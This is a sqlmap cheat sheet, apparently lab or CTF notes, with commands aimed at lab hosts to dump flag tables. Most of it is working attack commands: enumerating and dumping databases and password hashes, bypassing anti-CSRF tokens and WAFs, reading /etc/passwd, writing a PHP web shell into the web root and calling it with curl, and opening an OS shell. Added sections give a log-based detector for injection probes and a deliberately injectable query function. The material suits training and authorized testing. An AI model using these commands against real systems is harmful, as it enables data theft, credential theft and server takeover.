🗺️SQLMap

Installation

  • sudo apt install sqlmap

Manual Installation

  • git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Execution

  • python sqlmap.py

  • sqlmap -hh (advanced help; the letters below are the values accepted by --technique)

  • B: Boolean-based blind

  • E: Error-based

  • U: Union query-based

  • S: Stacked queries

  • T: Time-based blind

  • Q: Inline queries

  • sqlmap -u "http://www.example.com/vuln.php?id=1" --batch

Flag:

  • -u: provides the target URL

  • --batch: skips every prompt for user input and takes the default answer
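As an added, defender-side example (not part of the original notes), the script below classifies requests in a web-server access log by the same technique letters listed above and flags sqlmap's default User-Agent, which begins with sqlmap/. The log lines, IPs and version string are constructed for the example; the log format and field names are assumptions. Because --random-agent (used later on this page) replaces the User-Agent, the payload patterns are the more durable signal, and the B pattern also accepts the BETWEEN form that the between tamper produces.

```python
# Added example, not code from the original page: classify probe requests in
# an access log by sqlmap's --technique letters and flag its default User-Agent.
import re
from urllib.parse import unquote_plus

# Payload patterns keyed by the --technique letters (B/E/U/S/T/Q). Kept
# narrow on purpose so ordinary query strings do not match.
TECHNIQUE_PATTERNS = {
    "B": re.compile(r"\b(and|or)\s+\d+\s*(=|between\s+\d+\s+and)\s*\d+", re.I),  # Boolean-based blind
    "E": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),                   # Error-based
    "U": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),                        # Union query-based
    "S": re.compile(r";\s*(select|insert|update|delete|drop)\b", re.I),           # Stacked queries
    "T": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I),  # Time-based blind
    "Q": re.compile(r"\(\s*select\b", re.I),                                      # Inline queries
}
DEFAULT_UA = re.compile(r"^sqlmap/", re.I)  # sqlmap's stock User-Agent prefix

# Combined log format (assumed): ip ident user [ts] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample lines: one benign request, then four probes.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /vuln.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Oct/2023:13:56:01 +0000] "GET /vuln.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"',
    '10.0.0.7 - - [10/Oct/2023:13:56:02 +0000] "GET /vuln.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL HTTP/1.1" 200 640 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '10.0.0.7 - - [10/Oct/2023:13:56:09 +0000] "GET /vuln.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '10.0.0.7 - - [10/Oct/2023:13:56:10 +0000] "GET /vuln.php?id=1%20AND%201%20BETWEEN%201%20AND%201 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
]


def classify(path):
    """Return the sorted technique letters whose pattern matches the decoded path."""
    decoded = unquote_plus(path)
    return sorted(letter for letter, pat in TECHNIQUE_PATTERNS.items() if pat.search(decoded))


def analyse(lines):
    """Parse each log line and report requests that look like injection probes."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        techniques = classify(m["path"])
        sqlmap_ua = bool(DEFAULT_UA.match(m["ua"]))
        if techniques or sqlmap_ua:
            findings.append({
                "ip": m["ip"],
                "path": m["path"],
                "techniques": techniques,
                "sqlmap_ua": sqlmap_ua,
            })
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding)
```

Run against the constructed lines, the benign request produces nothing, the second line is flagged by both its Boolean payload and the stock User-Agent, and the remaining three are caught on payload alone even though their User-Agent looks like a browser.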

Testing POST

  • sqlmap 'http://www.example.com/' --data 'uid=1&name=test'

Special marker *

  • sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'

Full HTTP Requests

Run SQLMap with an HTTP request file

  • sqlmap -r req.txt

Cookies

  • sqlmap -u "http://157.245.46.51:30545/case3.php" --cookie='id=1' -p 'id' --param-filter='COOKIE' --level=2 --dump --batch

Display Errors

  • --parse-errors

Prefix/Suffix

  • sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"
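The prefix and suffix above tell sqlmap how to close the SQL context the parameter lands in. As an added example (not code from the original page), the two lookups below are written against an in-memory SQLite table constructed for the demonstration: the first builds its WHERE clause by string concatenation in exactly the shape that prefix assumes, the second binds the value as a parameter so no prefix or suffix can change the statement. Table contents, names and the search function are assumptions.

```python
# Added example, not code from the original page: the same search written
# with string concatenation and with a bound parameter.
import sqlite3


def make_db():
    """Build a throwaway in-memory table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "admin"), (2, "bob", "user"), (3, "frank", "user")],
    )
    return conn


def search_vulnerable(conn, q):
    # The value is spliced into the SQL text inside LIKE '%...%' and two
    # parentheses, which is the context a prefix of %')) is meant to close.
    sql = "SELECT name FROM users WHERE ((name LIKE '%" + q + "%') AND role = 'user')"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn, q):
    # The pattern travels as a bound parameter: quotes and parentheses in q
    # are data, never SQL. (% and _ still act as LIKE wildcards; use ESCAPE
    # if that matters for the application.)
    sql = "SELECT name FROM users WHERE ((name LIKE ?) AND role = 'user')"
    return [row[0] for row in conn.execute(sql, ("%" + q + "%",))]


if __name__ == "__main__":
    db = make_db()
    for query in ("f", "x%')) OR 1=1 -- -"):
        print(repr(query), search_vulnerable(db, query), search_parameterized(db, query))
```

With the ordinary input "f" both functions return the same row. With input shaped by the page's prefix and suffix, the concatenated version returns every user including the admin, because the remaining fragment is commented out by "-- -", while the parameterized version simply finds no name matching that literal string.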

Ref:

  • sqlmap -r req.txt --batch -T flag5 --no-cast --risk=3 --dump --technique=B

  • sqlmap -r req.txt --batch --dump --prefix='`)'

  • sqlmap -r req.txt --batch --dump --union-col=5 --no-cast

Basic DB Data Enumeration

  • Database version banner (switch --banner)

  • Current user name (switch --current-user)

  • Current database name (switch --current-db)

  • Whether the current user has DBA (administrator) rights (switch --is-dba)

sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba

Table Enumeration

sqlmap -u "http://www.example.com/?id=1" --tables -D testdb
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb

Tip: Apart from the default CSV, the output format can be set with --dump-format to HTML or SQLite, so the dumped data can later be examined in an SQLite environment.

Table/Row Enumeration

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --start=2 --stop=3

Conditional Enumeration

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"

Full DB Enumeration

  • --dump-all --exclude-sysdbs

DB Schema Enumeration

sqlmap -u "http://www.example.com/?id=1" --schema

Searching for Data

sqlmap -u "http://www.example.com/?id=1" --search -T user
sqlmap -u "http://www.example.com/?id=1" --search -C pass

Password Enumeration and Cracking

sqlmap -u "http://www.example.com/?id=1" --dump -D master -T users

DB Users Password Enumeration and Cracking

sqlmap -u "http://www.example.com/?id=1" --passwords --batch

Tip: The --all switch combined with --batch automa(g)ically runs the whole enumeration process against the target and reports every enumeration detail.

Anti-CSRF Token Bypass

  • --csrf-token

sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"

Unique Value Bypass

  • --randomize

sqlmap -u "http://www.example.com/?id=1&rp=29125" --randomize=rp --batch -v 5 | grep URI

Calculated Parameter Bypass

  • --eval

sqlmap -u "http://www.example.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib; h=hashlib.md5(id).hexdigest()" --batch -v 5 | grep URI

Ref:

  • sqlmap -u 'http://167.71.139.192:31141/case8.php' --data 'id=1&t0ken=wSQJPIxhc3AxIAaE8L2Jbas3OSlwkHjWdaolkgabU' --csrf-token="t0ken" -T flag8 --no-cast --dump

  • sqlmap -u 'http://167.71.139.192:31141/case9.php?id=1&uid=3022365281' --batch --randomize=uid -v 5 -T flag9 --dump --no-cast

  • sqlmap -u 'http://167.71.139.192:31141/case10.php' --data 'id=1' -p 'id' --random-agent --dump --batch --no-cast -T flag10

  • sqlmap -u 'http://167.71.139.192:31141/case11.php?id=1' -p 'id' --tamper=between --batch --dump --no-cast -T flag11

Checking for DBA Privileges

  • --is-dba

sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba

WAF Bypass

  • --skip-waf: skips sqlmap's heuristic detection of WAF/IPS protection

Reading Local Files

  • --file-read

sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"

Writing Local Files

  • --file-write

  • --file-dest

echo '<?php system($_GET["cmd"]); ?>' > shell.php
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
curl http://www.example.com/shell.php?cmd=ls+-la

OS Command Execution

  • --os-shell

sqlmap -u "http://www.example.com/?id=1" --os-shell
sqlmap -u "http://www.example.com/?id=1" --os-shell --technique=E

Ref:

  • sqlmap -u 'http://167.71.139.140:32080/?id=1' --file-read '/var/www/html/flag.txt'

  • sqlmap -r req.txt -D <database> -T <table> --dump --batch --no-cast --tamper=between

  • --dump-all --batch --no-cast --exclude-sysdbs --random-agent --skip-waf --tamper=between
